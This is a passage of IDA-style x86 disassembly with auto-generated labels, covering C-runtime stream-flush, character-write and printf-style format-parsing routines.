loc_406C21:				; CODE XREF: sub_406B86+8Cj
		push	esi
		call	sub_40D8AC
		pop	ecx

loc_406C28:				; CODE XREF: sub_406B86+74j
					; sub_406B86+99j
		test	word ptr [esi+0Ch], 108h
		push	edi
		jz	loc_406CB5
		mov	eax, [esi+8]
		mov	edi, [esi]
		lea	ecx, [eax+1]
		mov	[esi], ecx
		mov	ecx, [esi+18h]
		sub	edi, eax
		dec	ecx
		cmp	edi, ebx
		mov	[esi+4], ecx
		jle	short loc_406C69
		push	edi
		push	eax
		push	[ebp+arg_4]
		call	sub_40D7D0
		add	esp, 0Ch
		mov	[ebp+var_4], eax
		jmp	short loc_406CAB
; ---------------------------------------------------------------------------

loc_406C5E:				; CODE XREF: sub_406B86+4Dj
		or	eax, 20h
		mov	[esi+0Ch], eax
		or	eax, 0FFFFFFFFh
		jmp	short loc_406CE2
; ---------------------------------------------------------------------------

loc_406C69:				; CODE XREF: sub_406B86+C4j
		mov	ecx, [ebp+arg_4]
		cmp	ecx, 0FFFFFFFFh
		jz	short loc_406C8C
		cmp	ecx, 0FFFFFFFEh
		jz	short loc_406C8C
		mov	eax, ecx
		and	eax, 1Fh
		imul	eax, 28h
		mov	edx, ecx
		sar	edx, 5
		add	eax, dword_435300[edx*4]
		jmp	short loc_406C91
; ---------------------------------------------------------------------------

loc_406C8C:				; CODE XREF: sub_406B86+E9j
					; sub_406B86+EEj
		mov	eax, offset dword_423BD0

loc_406C91:				; CODE XREF: sub_406B86+104j
		test	byte ptr [eax+4], 20h
		jz	short loc_406CAB
		push	2
		push	ebx
		push	ebx
		push	ecx
		call	sub_40D0F1
		and	eax, edx
		add	esp, 10h
		cmp	eax, 0FFFFFFFFh
		jz	short loc_406CD0

loc_406CAB:				; CODE XREF: sub_406B86+D6j
					; sub_406B86+10Fj
		mov	eax, [esi+8]
		mov	cl, byte ptr [ebp+arg_0]
		mov	[eax], cl
		jmp	short loc_406CCB
; ---------------------------------------------------------------------------

loc_406CB5:				; CODE XREF: sub_406B86+A9j
		xor	edi, edi
		inc	edi
		push	edi
		lea	eax, [ebp+arg_0]
		push	eax
		push	[ebp+arg_4]
		call	sub_40D7D0
		add	esp, 0Ch
		mov	[ebp+var_4], eax

loc_406CCB:				; CODE XREF: sub_406B86+12Dj
		cmp	[ebp+var_4], edi
		jz	short loc_406CD9

loc_406CD0:				; CODE XREF: sub_406B86+123j
		or	dword ptr [esi+0Ch], 20h
		or	eax, 0FFFFFFFFh
		jmp	short loc_406CE1
; ---------------------------------------------------------------------------

loc_406CD9:				; CODE XREF: sub_406B86+148j
		mov	eax, [ebp+arg_0]
		and	eax, 0FFh

loc_406CE1:				; CODE XREF: sub_406B86+151j
		pop	edi

loc_406CE2:				; CODE XREF: sub_406B86+E1j
		pop	ebx

loc_406CE3:				; CODE XREF: sub_406B86+2Bj
		pop	esi
		leave
		retn
sub_406B86	endp


; =============== S U B	R O U T	I N E =======================================



sub_406CE6	proc near		; CODE XREF: sub_406D19+11p
					; sub_406D3D+22p ...
		test	byte ptr [ecx+0Ch], 40h
		jz	short loc_406CF2
		cmp	dword ptr [ecx+8], 0
		jz	short loc_406D16

loc_406CF2:				; CODE XREF: sub_406CE6+4j
		dec	dword ptr [ecx+4]
		js	short loc_406D02
		mov	edx, [ecx]
		mov	[edx], al
		inc	dword ptr [ecx]
		movzx	eax, al
		jmp	short loc_406D0E
; ---------------------------------------------------------------------------

loc_406D02:				; CODE XREF: sub_406CE6+Fj
		movsx	eax, al
		push	ecx
		push	eax
		call	sub_406B86
		pop	ecx
		pop	ecx

loc_406D0E:				; CODE XREF: sub_406CE6+1Aj
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_406D16
		or	[esi], eax
		retn
; ---------------------------------------------------------------------------

loc_406D16:				; CODE XREF: sub_406CE6+Aj
					; sub_406CE6+2Bj
		inc	dword ptr [esi]
		retn
sub_406CE6	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_406D19	proc near		; CODE XREF: sub_406D87+853p
					; sub_406D87+880p ...

arg_0		= byte ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		push	esi
		mov	esi, eax
		jmp	short loc_406D34
; ---------------------------------------------------------------------------

loc_406D21:				; CODE XREF: sub_406D19+1Fj
		mov	ecx, [ebp+arg_8]
		mov	al, [ebp+arg_0]
		dec	[ebp+arg_4]
		call	sub_406CE6
		cmp	dword ptr [esi], 0FFFFFFFFh
		jz	short loc_406D3A

loc_406D34:				; CODE XREF: sub_406D19+6j
		cmp	[ebp+arg_4], 0
		jg	short loc_406D21

loc_406D3A:				; CODE XREF: sub_406D19+19j
		pop	esi
		pop	ebp
		retn
sub_406D19	endp


; =============== S U B	R O U T	I N E =======================================



sub_406D3D	proc near		; CODE XREF: sub_406D87+867p
					; sub_406D87+8CEp ...

arg_0		= dword	ptr  4

		test	byte ptr [edi+0Ch], 40h
		push	ebx
		push	esi
		mov	esi, eax
		mov	ebx, ecx
		jz	short loc_406D7D
		cmp	dword ptr [edi+8], 0
		jnz	short loc_406D7D
		mov	eax, [esp+8+arg_0]
		add	[esi], eax
		jmp	short loc_406D84
; ---------------------------------------------------------------------------

loc_406D57:				; CODE XREF: sub_406D3D+45j
		mov	al, [ebx]
		dec	[esp+8+arg_0]
		mov	ecx, edi
		call	sub_406CE6
		inc	ebx
		cmp	dword ptr [esi], 0FFFFFFFFh
		jnz	short loc_406D7D
		call	sub_405B83
		cmp	dword ptr [eax], 2Ah
		jnz	short loc_406D84
		mov	ecx, edi
		mov	al, 3Fh
		call	sub_406CE6

loc_406D7D:				; CODE XREF: sub_406D3D+Aj
					; sub_406D3D+10j ...
		cmp	[esp+8+arg_0], 0
		jg	short loc_406D57

loc_406D84:				; CODE XREF: sub_406D3D+18j
					; sub_406D3D+35j
		pop	esi
		pop	ebx
		retn
sub_406D3D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=1F8h


sub_406D87	proc near		; CODE XREF: sub_402EAE+80p
					; sub_403475+53p ...

var_278		= dword	ptr -278h
var_274		= dword	ptr -274h
var_270		= dword	ptr -270h
var_26C		= dword	ptr -26Ch
var_268		= dword	ptr -268h
var_260		= dword	ptr -260h
var_25C		= byte ptr -25Ch
var_254		= dword	ptr -254h
var_250		= byte ptr -250h
var_24C		= dword	ptr -24Ch
var_248		= dword	ptr -248h
var_244		= dword	ptr -244h
var_240		= dword	ptr -240h
var_23C		= dword	ptr -23Ch
var_238		= dword	ptr -238h
var_234		= dword	ptr -234h
var_230		= byte ptr -230h
var_22F		= byte ptr -22Fh
var_22C		= dword	ptr -22Ch
var_228		= dword	ptr -228h
var_224		= dword	ptr -224h
var_220		= dword	ptr -220h
var_21C		= dword	ptr -21Ch
var_218		= dword	ptr -218h
var_211		= byte ptr -211h
var_210		= dword	ptr -210h
var_20C		= byte ptr -20Ch
var_D		= byte ptr -0Dh
var_C		= byte ptr -0Ch
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		lea	ebp, [esp-1F8h]
		sub	esp, 278h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+1F8h+var_4], eax
		mov	eax, [ebp+1F8h+arg_0]
		push	ebx
		mov	ebx, [ebp+1F8h+arg_4]
		push	esi
		xor	esi, esi
		push	edi
		mov	edi, [ebp+1F8h+arg_C]
		push	[ebp+1F8h+arg_8]
		lea	ecx, [ebp+1F8h+var_25C]
		mov	[ebp+1F8h+var_228], eax
		mov	[ebp+1F8h+var_224], edi
		mov	[ebp+1F8h+var_244], esi
		mov	[ebp+1F8h+var_210], esi
		mov	[ebp+1F8h+var_238], esi
		mov	[ebp+1F8h+var_218], esi
		mov	[ebp+1F8h+var_234], esi
		mov	[ebp+1F8h+var_248], esi
		mov	[ebp+1F8h+var_23C], esi
		call	sub_402ADF
		cmp	[ebp+1F8h+var_228], esi
		jnz	short loc_406E14

loc_406DE7:				; CODE XREF: sub_406D87+E5j
					; sub_406D87+138j ...
		call	sub_405B83
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 16h
		push	esi

loc_406DF7:				; CODE XREF: sub_406D87+948j
		call	sub_4032F9
		add	esp, 14h
		cmp	[ebp+1F8h+var_250], 0
		jz	short loc_406E0C
		mov	eax, [ebp+1F8h+var_254]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_406E0C:				; CODE XREF: sub_406D87+7Cj
		or	eax, 0FFFFFFFFh
		jmp	loc_4076E4
; ---------------------------------------------------------------------------

loc_406E14:				; CODE XREF: sub_406D87+5Ej
		mov	eax, [ebp+1F8h+var_228]
		test	byte ptr [eax+0Ch], 40h
		jnz	loc_406EC5
		push	eax
		call	sub_408DD0
		cmp	eax, 0FFFFFFFFh
		pop	ecx
		jz	short loc_406E63
		push	[ebp+1F8h+var_228]
		call	sub_408DD0
		cmp	eax, 0FFFFFFFEh
		pop	ecx
		jz	short loc_406E63
		push	[ebp+1F8h+var_228]
		call	sub_408DD0
		push	[ebp+1F8h+var_228]
		sar	eax, 5
		lea	esi, ds:435300h[eax*4]
		call	sub_408DD0
		and	eax, 1Fh
		imul	eax, 28h
		add	eax, [esi]
		pop	ecx
		pop	ecx
		xor	esi, esi
		jmp	short loc_406E68
; ---------------------------------------------------------------------------

loc_406E63:				; CODE XREF: sub_406D87+A4j
					; sub_406D87+B2j
		mov	eax, offset dword_423BD0

loc_406E68:				; CODE XREF: sub_406D87+DAj
		test	byte ptr [eax+24h], 7Fh
		jnz	loc_406DE7
		push	[ebp+1F8h+var_228]
		call	sub_408DD0
		cmp	eax, 0FFFFFFFFh
		pop	ecx
		jz	short loc_406EB6
		push	[ebp+1F8h+var_228]
		call	sub_408DD0
		cmp	eax, 0FFFFFFFEh
		pop	ecx
		jz	short loc_406EB6
		push	[ebp+1F8h+var_228]
		call	sub_408DD0
		push	[ebp+1F8h+var_228]
		sar	eax, 5
		lea	esi, ds:435300h[eax*4]
		call	sub_408DD0
		and	eax, 1Fh
		imul	eax, 28h
		add	eax, [esi]
		pop	ecx
		pop	ecx
		xor	esi, esi
		jmp	short loc_406EBB
; ---------------------------------------------------------------------------

loc_406EB6:				; CODE XREF: sub_406D87+F7j
					; sub_406D87+105j
		mov	eax, offset dword_423BD0

loc_406EBB:				; CODE XREF: sub_406D87+12Dj
		test	byte ptr [eax+24h], 80h
		jnz	loc_406DE7

loc_406EC5:				; CODE XREF: sub_406D87+94j
		cmp	ebx, esi
		jz	loc_406DE7
		mov	dl, [ebx]
		xor	ecx, ecx
		test	dl, dl
		mov	[ebp+1F8h+var_22C], esi
		mov	[ebp+1F8h+var_220], esi
		mov	[ebp+1F8h+var_24C], esi
		mov	[ebp+1F8h+var_211], dl
		jz	loc_4076D4

loc_406EE5:				; CODE XREF: sub_406D87+931j
		inc	ebx
		cmp	[ebp+1F8h+var_22C], 0
		mov	[ebp+1F8h+var_240], ebx
		jl	loc_4076D4
		mov	al, dl
		sub	al, 20h
		cmp	al, 58h
		ja	short loc_406F0C
		movsx	eax, dl
		movzx	eax, ds:byte_41D4E8[eax]
		and	eax, 0Fh
		xor	esi, esi
		jmp	short loc_406F10
; ---------------------------------------------------------------------------

loc_406F0C:				; CODE XREF: sub_406D87+172j
		xor	esi, esi
		xor	eax, eax

loc_406F10:				; CODE XREF: sub_406D87+183j
		movsx	eax, ds:byte_41D508[ecx+eax*8]
		push	7
		sar	eax, 4
		pop	ecx
		cmp	eax, ecx	; switch 8 cases
		mov	[ebp+1F8h+var_26C], eax
		ja	loc_4076A4	; default
		jmp	ds:off_4076FF[eax*4] ; switch jump

loc_406F30:				; DATA XREF: .text:off_4076FFo
		or	[ebp+1F8h+var_218], 0FFFFFFFFh ; jumptable 00406F29 case 1
		mov	[ebp+1F8h+var_270], esi
		mov	[ebp+1F8h+var_248], esi
		mov	[ebp+1F8h+var_238], esi
		mov	[ebp+1F8h+var_234], esi
		mov	[ebp+1F8h+var_210], esi
		mov	[ebp+1F8h+var_23C], esi
		jmp	loc_4076A4	; default
; ---------------------------------------------------------------------------

loc_406F4B:				; CODE XREF: sub_406D87+1A2j
					; DATA XREF: .text:off_4076FFo
		movsx	eax, dl		; jumptable 00406F29 case 2
		sub	eax, 20h
		jz	short loc_406F91
		sub	eax, 3
		jz	short loc_406F85
		sub	eax, 8
		jz	short loc_406F7C
		dec	eax
		dec	eax
		jz	short loc_406F73
		sub	eax, 3
		jnz	loc_4076A4	; default
		or	[ebp+1F8h+var_210], 8
		jmp	loc_4076A4	; default
; ---------------------------------------------------------------------------

loc_406F73:				; CODE XREF: sub_406D87+1D8j
		or	[ebp+1F8h+var_210], 4
		jmp	loc_4076A4	; default
; ---------------------------------------------------------------------------

loc_406F7C:				; CODE XREF: sub_406D87+1D4j
		or	[ebp+1F8h+var_210], 1
		jmp	loc_4076A4	; default
; ---------------------------------------------------------------------------

loc_406F85:				; CODE XREF: sub_406D87+1CFj
		or	[ebp+1F8h+var_210], 80h
		jmp	loc_4076A4	; default
; ---------------------------------------------------------------------------

loc_406F91:				; CODE XREF: sub_406D87+1CAj
		or	[ebp+1F8h+var_210], 2
		jmp	loc_4076A4	; default
; ---------------------------------------------------------------------------

loc_406F9A:				; CODE XREF: sub_406D87+1A2j
					; DATA XREF: .text:off_4076FFo
		cmp	dl, 2Ah		; jumptable 00406F29 case 3
		jnz	short loc_406FBF
		add	edi, 4
		mov	[ebp+1F8h+var_224], edi
		mov	edi, [edi-4]
		cmp	edi, esi
		mov	[ebp+1F8h+var_238], edi
		jge	loc_4076A4	; default
		or	[ebp+1F8h+var_210], 4
		neg	[ebp+1F8h+var_238]
		jmp	loc_4076A4	; default
; ---------------------------------------------------------------------------

loc_406FBF:				; CODE XREF: sub_406D87+216j
		mov	eax, [ebp+1F8h+var_238]
		imul	eax, 0Ah
		movsx	ecx, dl
		lea	eax, [eax+ecx-30h]
		mov	[ebp+1F8h+var_238], eax
		jmp	loc_4076A4	; default
; ---------------------------------------------------------------------------

loc_406FD4:				; CODE XREF: sub_406D87+1A2j
					; DATA XREF: .text:off_4076FFo
		mov	[ebp+1F8h+var_218], esi	; jumptable 00406F29 case 4
		jmp	loc_4076A4	; default
; ---------------------------------------------------------------------------

loc_406FDC:				; CODE XREF: sub_406D87+1A2j
					; DATA XREF: .text:off_4076FFo
		cmp	dl, 2Ah		; jumptable 00406F29 case 5
		jnz	short loc_406FFE
		add	edi, 4
		mov	[ebp+1F8h+var_224], edi
		mov	edi, [edi-4]
		cmp	edi, esi
		mov	[ebp+1F8h+var_218], edi
		jge	loc_4076A4	; default
		or	[ebp+1F8h+var_218], 0FFFFFFFFh
		jmp	loc_4076A4	; default
; ---------------------------------------------------------------------------

loc_406FFE:				; CODE XREF: sub_406D87+258j
		mov	eax, [ebp+1F8h+var_218]
		imul	eax, 0Ah
		movsx	ecx, dl
		lea	eax, [eax+ecx-30h]
		mov	[ebp+1F8h+var_218], eax
		jmp	loc_4076A4	; default
; ---------------------------------------------------------------------------

loc_407013:				; CODE XREF: sub_406D87+1A2j
					; DATA XREF: .text:off_4076FFo
		cmp	dl, 49h		; jumptable 00406F29 case 6
		jz	short loc_40705E
		cmp	dl, 68h
		jz	short loc_407055
		cmp	dl, 6Ch
		jz	short loc_407037
		cmp	dl, 77h
		jnz	loc_4076A4	; default
		or	[ebp+1F8h+var_210], 800h
		jmp	loc_4076A4	; default
; ---------------------------------------------------------------------------

loc_407037:				; CODE XREF: sub_406D87+299j
		cmp	byte ptr [ebx],	6Ch
		jnz	short loc_40704C
		inc	ebx
		or	[ebp+1F8h+var_210], 1000h
		mov	[ebp+1F8h+var_240], ebx
		jmp	loc_4076A4	; default
; ---------------------------------------------------------------------------

loc_40704C:				; CODE XREF: sub_406D87+2B3j
		or	[ebp+1F8h+var_210], 10h
		jmp	loc_4076A4	; default
; ---------------------------------------------------------------------------

loc_407055:				; CODE XREF: sub_406D87+294j
		or	[ebp+1F8h+var_210], 20h
		jmp	loc_4076A4	; default
; ---------------------------------------------------------------------------

loc_40705E:				; CODE XREF: sub_406D87+28Fj
		mov	al, [ebx]
		cmp	al, 36h
		jnz	short loc_40707B
		cmp	byte ptr [ebx+1], 34h
		jnz	short loc_40707B
		inc	ebx
		inc	ebx
		or	[ebp+1F8h+var_210], 8000h
		mov	[ebp+1F8h+var_240], ebx
		jmp	loc_4076A4	; default
; ---------------------------------------------------------------------------

loc_40707B:				; CODE XREF: sub_406D87+2DBj
					; sub_406D87+2E1j
		cmp	al, 33h
		jnz	short loc_407096
		cmp	byte ptr [ebx+1], 32h
		jnz	short loc_407096
		inc	ebx
		inc	ebx
		and	[ebp+1F8h+var_210], 0FFFF7FFFh
		mov	[ebp+1F8h+var_240], ebx
		jmp	loc_4076A4	; default
; ---------------------------------------------------------------------------

loc_407096:				; CODE XREF: sub_406D87+2F6j
					; sub_406D87+2FCj
		cmp	al, 64h
		jz	loc_4076A4	; default
		cmp	al, 69h
		jz	loc_4076A4	; default
		cmp	al, 6Fh
		jz	loc_4076A4	; default
		cmp	al, 75h
		jz	loc_4076A4	; default
		cmp	al, 78h
		jz	loc_4076A4	; default
		cmp	al, 58h
		jz	loc_4076A4	; default
		mov	[ebp+1F8h+var_26C], esi

loc_4070C9:				; CODE XREF: sub_406D87+1A2j
					; DATA XREF: .text:off_4076FFo
		lea	eax, [ebp+1F8h+var_25C]	; jumptable 00406F29 case 0
		push	eax
		movzx	eax, dl
		push	eax
		mov	[ebp+1F8h+var_23C], esi
		call	sub_40CDB0
		pop	ecx
		test	eax, eax
		mov	al, [ebp+1F8h+var_211]
		pop	ecx
		jz	short loc_4070FB
		mov	ecx, [ebp+1F8h+var_228]
		lea	esi, [ebp+1F8h+var_22C]
		call	sub_406CE6
		mov	al, [ebx]
		inc	ebx
		test	al, al
		mov	[ebp+1F8h+var_240], ebx
		jz	loc_4076BD

loc_4070FB:				; CODE XREF: sub_406D87+359j
		mov	ecx, [ebp+1F8h+var_228]
		lea	esi, [ebp+1F8h+var_22C]
		call	sub_406CE6
		jmp	loc_4076A4	; default
; ---------------------------------------------------------------------------

loc_40710B:				; CODE XREF: sub_406D87+1A2j
					; DATA XREF: .text:off_4076FFo
		movsx	eax, dl		; jumptable 00406F29 case 7
		cmp	eax, 64h
		jg	loc_407289
		jz	loc_407308
		cmp	eax, 53h
		jg	loc_4071D1
		jz	short loc_407182
		sub	eax, 41h
		jz	short loc_40713D
		dec	eax
		dec	eax
		jz	short loc_407171
		dec	eax
		dec	eax
		jz	short loc_40713D
		dec	eax
		dec	eax
		jnz	loc_40758C

loc_40713D:				; CODE XREF: sub_406D87+3A4j
					; sub_406D87+3ACj
		add	dl, 20h
		mov	[ebp+1F8h+var_270], 1
		mov	[ebp+1F8h+var_211], dl

loc_40714A:				; CODE XREF: sub_406D87+459j
					; sub_406D87+51Dj
		or	[ebp+1F8h+var_210], 40h
		cmp	[ebp+1F8h+var_218], esi
		lea	ebx, [ebp+1F8h+var_20C]
		mov	eax, 200h
		mov	[ebp+1F8h+var_21C], ebx
		mov	[ebp+1F8h+var_260], eax
		jge	loc_40732C
		mov	[ebp+1F8h+var_218], 6
		jmp	loc_40737A
; ---------------------------------------------------------------------------

loc_407171:				; CODE XREF: sub_406D87+3A8j
		test	word ptr [ebp+1F8h+var_210], 830h
		jnz	short loc_4071EE
		or	[ebp+1F8h+var_210], 800h
		jmp	short loc_4071EE
; ---------------------------------------------------------------------------

loc_407182:				; CODE XREF: sub_406D87+39Fj
		test	word ptr [ebp+1F8h+var_210], 830h
		jnz	short loc_407191
		or	[ebp+1F8h+var_210], 800h

loc_407191:				; CODE XREF: sub_406D87+401j
					; sub_406D87+694j
		mov	ecx, [ebp+1F8h+var_218]
		cmp	ecx, 0FFFFFFFFh
		jnz	short loc_40719E
		mov	ecx, 7FFFFFFFh

loc_40719E:				; CODE XREF: sub_406D87+410j
		add	edi, 4
		test	word ptr [ebp+1F8h+var_210], 810h
		mov	[ebp+1F8h+var_224], edi
		mov	edi, [edi-4]
		mov	[ebp+1F8h+var_21C], edi
		jz	loc_40756A
		cmp	edi, esi
		jnz	short loc_4071C2
		mov	eax, off_423928
		mov	[ebp+1F8h+var_21C], eax

loc_4071C2:				; CODE XREF: sub_406D87+431j
		mov	eax, [ebp+1F8h+var_21C]
		mov	[ebp+1F8h+var_23C], 1
		jmp	loc_40755F
; ---------------------------------------------------------------------------

loc_4071D1:				; CODE XREF: sub_406D87+399j
		sub	eax, 58h
		jz	loc_407413
		dec	eax
		dec	eax
		jz	short loc_40723B
		sub	eax, ecx
		jz	loc_40714A
		dec	eax
		dec	eax
		jnz	loc_40758C

loc_4071EE:				; CODE XREF: sub_406D87+3F0j
					; sub_406D87+3F9j
		add	edi, 4
		test	word ptr [ebp+1F8h+var_210], 810h
		mov	[ebp+1F8h+var_224], edi
		jz	short loc_407223
		movzx	eax, word ptr [edi-4]
		push	eax
		push	200h
		lea	eax, [ebp+1F8h+var_20C]
		push	eax
		lea	eax, [ebp+1F8h+var_220]
		push	eax
		call	sub_40DAE2
		add	esp, 10h
		test	eax, eax
		jz	short loc_407230
		mov	[ebp+1F8h+var_248], 1
		jmp	short loc_407230
; ---------------------------------------------------------------------------

loc_407223:				; CODE XREF: sub_406D87+473j
		mov	al, [edi-4]
		mov	[ebp+1F8h+var_20C], al
		mov	[ebp+1F8h+var_220], 1

loc_407230:				; CODE XREF: sub_406D87+491j
					; sub_406D87+49Aj
		lea	eax, [ebp+1F8h+var_20C]
		mov	[ebp+1F8h+var_21C], eax
		jmp	loc_40758C
; ---------------------------------------------------------------------------

loc_40723B:				; CODE XREF: sub_406D87+455j
		mov	eax, [edi]
		add	edi, 4
		cmp	eax, esi
		mov	[ebp+1F8h+var_224], edi
		jz	short loc_407275
		mov	ecx, [eax+4]
		cmp	ecx, esi
		jz	short loc_407275
		test	word ptr [ebp+1F8h+var_210], 800h
		movsx	eax, word ptr [eax]
		mov	[ebp+1F8h+var_21C], ecx
		jz	short loc_40726D
		cdq
		sub	eax, edx
		sar	eax, 1
		mov	[ebp+1F8h+var_23C], 1
		jmp	loc_407589
; ---------------------------------------------------------------------------

loc_40726D:				; CODE XREF: sub_406D87+4D3j
		mov	[ebp+1F8h+var_23C], esi
		jmp	loc_407589
; ---------------------------------------------------------------------------

loc_407275:				; CODE XREF: sub_406D87+4BEj
					; sub_406D87+4C5j
		mov	eax, off_423924
		mov	[ebp+1F8h+var_21C], eax
		push	eax

loc_40727E:				; CODE XREF: sub_406D87+680j
		call	sub_4044E0
		pop	ecx
		jmp	loc_407589
; ---------------------------------------------------------------------------

loc_407289:				; CODE XREF: sub_406D87+38Aj
		cmp	eax, 70h
		jg	loc_407418
		jz	loc_40740C
		cmp	eax, 65h
		jl	loc_40758C
		cmp	eax, 67h
		jle	loc_40714A
		cmp	eax, 69h
		jz	short loc_407308
		cmp	eax, 6Eh
		jz	short loc_4072D3
		cmp	eax, 6Fh
		jnz	loc_40758C
		test	byte ptr [ebp+1F8h+var_210], 80h
		mov	[ebp+1F8h+var_220], 8
		jz	short loc_407313
		or	[ebp+1F8h+var_210], 200h
		jmp	short loc_407313
; ---------------------------------------------------------------------------

loc_4072D3:				; CODE XREF: sub_406D87+52Bj
		mov	esi, [edi]
		add	edi, 4
		mov	[ebp+1F8h+var_224], edi
		call	sub_40D96D
		test	eax, eax
		jz	loc_4076BD
		test	byte ptr [ebp+1F8h+var_210], 20h
		jz	short loc_4072F7
		mov	ax, word ptr [ebp+1F8h+var_22C]
		mov	[esi], ax
		jmp	short loc_4072FC
; ---------------------------------------------------------------------------

loc_4072F7:				; CODE XREF: sub_406D87+565j
		mov	eax, [ebp+1F8h+var_22C]
		mov	[esi], eax

loc_4072FC:				; CODE XREF: sub_406D87+56Ej
		mov	[ebp+1F8h+var_248], 1
		jmp	loc_407691
; ---------------------------------------------------------------------------

loc_407308:				; CODE XREF: sub_406D87+390j
					; sub_406D87+526j
		or	[ebp+1F8h+var_210], 40h

loc_40730C:				; CODE XREF: sub_406D87+69Cj
		mov	[ebp+1F8h+var_220], 0Ah

loc_407313:				; CODE XREF: sub_406D87+541j
					; sub_406D87+54Aj ...
		mov	ecx, [ebp+1F8h+var_210]
		test	cx, cx
		jns	loc_407462

loc_40731F:				; CODE XREF: sub_406D87+6E0j
		mov	eax, [edi]
		mov	edx, [edi+4]
		add	edi, 8
		jmp	loc_407497
; ---------------------------------------------------------------------------

loc_40732C:				; CODE XREF: sub_406D87+3D8j
		jnz	short loc_40733C
		cmp	dl, 67h
		jnz	short loc_40737A
		mov	[ebp+1F8h+var_218], 1
		jmp	short loc_40737A
; ---------------------------------------------------------------------------

loc_40733C:				; CODE XREF: sub_406D87:loc_40732Cj
		cmp	[ebp+1F8h+var_218], eax
		jle	short loc_407344
		mov	[ebp+1F8h+var_218], eax

loc_407344:				; CODE XREF: sub_406D87+5B8j
		cmp	[ebp+1F8h+var_218], 0A3h
		jle	short loc_40737A
		mov	esi, [ebp+1F8h+var_218]
		add	esi, 15Dh
		push	esi
		call	sub_407AEA
		test	eax, eax
		mov	dl, [ebp+1F8h+var_211]
		pop	ecx
		mov	[ebp+1F8h+var_24C], eax
		jz	short loc_407371
		mov	[ebp+1F8h+var_21C], eax
		mov	[ebp+1F8h+var_260], esi
		mov	ebx, eax
		jmp	short loc_407378
; ---------------------------------------------------------------------------

loc_407371:				; CODE XREF: sub_406D87+5DEj
		mov	[ebp+1F8h+var_218], 0A3h

loc_407378:				; CODE XREF: sub_406D87+5E8j
		xor	esi, esi

loc_40737A:				; CODE XREF: sub_406D87+3E5j
					; sub_406D87+5AAj ...
		mov	eax, [edi]
		add	edi, 8
		mov	[ebp+1F8h+var_278], eax
		mov	eax, [edi-4]
		mov	[ebp+1F8h+var_274], eax
		lea	eax, [ebp+1F8h+var_25C]
		push	eax
		push	[ebp+1F8h+var_270]
		movsx	eax, dl
		push	[ebp+1F8h+var_218]
		mov	[ebp+1F8h+var_224], edi
		push	eax
		push	[ebp+1F8h+var_260]
		lea	eax, [ebp+1F8h+var_278]
		push	ebx
		push	eax
		push	off_423F98
		call	sub_405543
		pop	ecx
		call	eax
		mov	edi, [ebp+1F8h+var_210]
		add	esp, 1Ch
		and	edi, 80h
		jz	short loc_4073D7
		cmp	[ebp+1F8h+var_218], esi
		jnz	short loc_4073D7
		lea	eax, [ebp+1F8h+var_25C]
		push	eax
		push	ebx
		push	off_423FA4
		call	sub_405543
		pop	ecx
		call	eax
		pop	ecx
		pop	ecx

loc_4073D7:				; CODE XREF: sub_406D87+634j
					; sub_406D87+639j
		cmp	[ebp+1F8h+var_211], 67h
		jnz	short loc_4073F6
		cmp	edi, esi
		jnz	short loc_4073F6
		lea	eax, [ebp+1F8h+var_25C]
		push	eax
		push	ebx
		push	off_423FA0
		call	sub_405543
		pop	ecx
		call	eax
		pop	ecx
		pop	ecx

loc_4073F6:				; CODE XREF: sub_406D87+654j
					; sub_406D87+658j
		cmp	byte ptr [ebx],	2Dh
		jnz	short loc_407406
		or	[ebp+1F8h+var_210], 100h
		inc	ebx
		mov	[ebp+1F8h+var_21C], ebx

loc_407406:				; CODE XREF: sub_406D87+672j
		push	ebx
		jmp	loc_40727E
; ---------------------------------------------------------------------------

loc_40740C:				; CODE XREF: sub_406D87+50Bj
		mov	[ebp+1F8h+var_218], 8

loc_407413:				; CODE XREF: sub_406D87+44Dj
		mov	[ebp+1F8h+var_244], ecx
		jmp	short loc_407439
; ---------------------------------------------------------------------------

loc_407418:				; CODE XREF: sub_406D87+505j
		sub	eax, 73h
		jz	loc_407191
		dec	eax
		dec	eax
		jz	loc_40730C
		sub	eax, 3
		jnz	loc_40758C
		mov	[ebp+1F8h+var_244], 27h

loc_407439:				; CODE XREF: sub_406D87+68Fj
		test	byte ptr [ebp+1F8h+var_210], 80h
		mov	[ebp+1F8h+var_220], 10h
		jz	loc_407313
		mov	al, byte ptr [ebp+1F8h+var_244]
		add	al, 51h
		mov	[ebp+1F8h+var_230], 30h
		mov	[ebp+1F8h+var_22F], al
		mov	[ebp+1F8h+var_234], 2
		jmp	loc_407313
; ---------------------------------------------------------------------------

loc_407462:				; CODE XREF: sub_406D87+592j
		test	cx, 1000h
		jnz	loc_40731F
		add	edi, 4
		test	cl, 20h
		jz	short loc_40748A
		test	cl, 40h
		mov	[ebp+1F8h+var_224], edi
		jz	short loc_407483
		movsx	eax, word ptr [edi-4]
		jmp	short loc_407487
; ---------------------------------------------------------------------------

loc_407483:				; CODE XREF: sub_406D87+6F4j
		movzx	eax, word ptr [edi-4]

loc_407487:				; CODE XREF: sub_406D87+6FAj
		cdq
		jmp	short loc_40749A
; ---------------------------------------------------------------------------

loc_40748A:				; CODE XREF: sub_406D87+6ECj
		test	cl, 40h
		mov	eax, [edi-4]
		jz	short loc_407495
		cdq
		jmp	short loc_407497
; ---------------------------------------------------------------------------

loc_407495:				; CODE XREF: sub_406D87+709j
		xor	edx, edx

loc_407497:				; CODE XREF: sub_406D87+5A0j
					; sub_406D87+70Cj
		mov	[ebp+1F8h+var_224], edi

loc_40749A:				; CODE XREF: sub_406D87+701j
		test	cl, 40h
		jz	short loc_4074B7
		cmp	edx, esi
		jg	short loc_4074B7
		jl	short loc_4074A9
		cmp	eax, esi
		jnb	short loc_4074B7

loc_4074A9:				; CODE XREF: sub_406D87+71Cj
		neg	eax
		adc	edx, 0
		neg	edx
		or	[ebp+1F8h+var_210], 100h

loc_4074B7:				; CODE XREF: sub_406D87+716j
					; sub_406D87+71Aj ...
		test	word ptr [ebp+1F8h+var_210], 9000h
		mov	ebx, edx
		mov	edi, eax
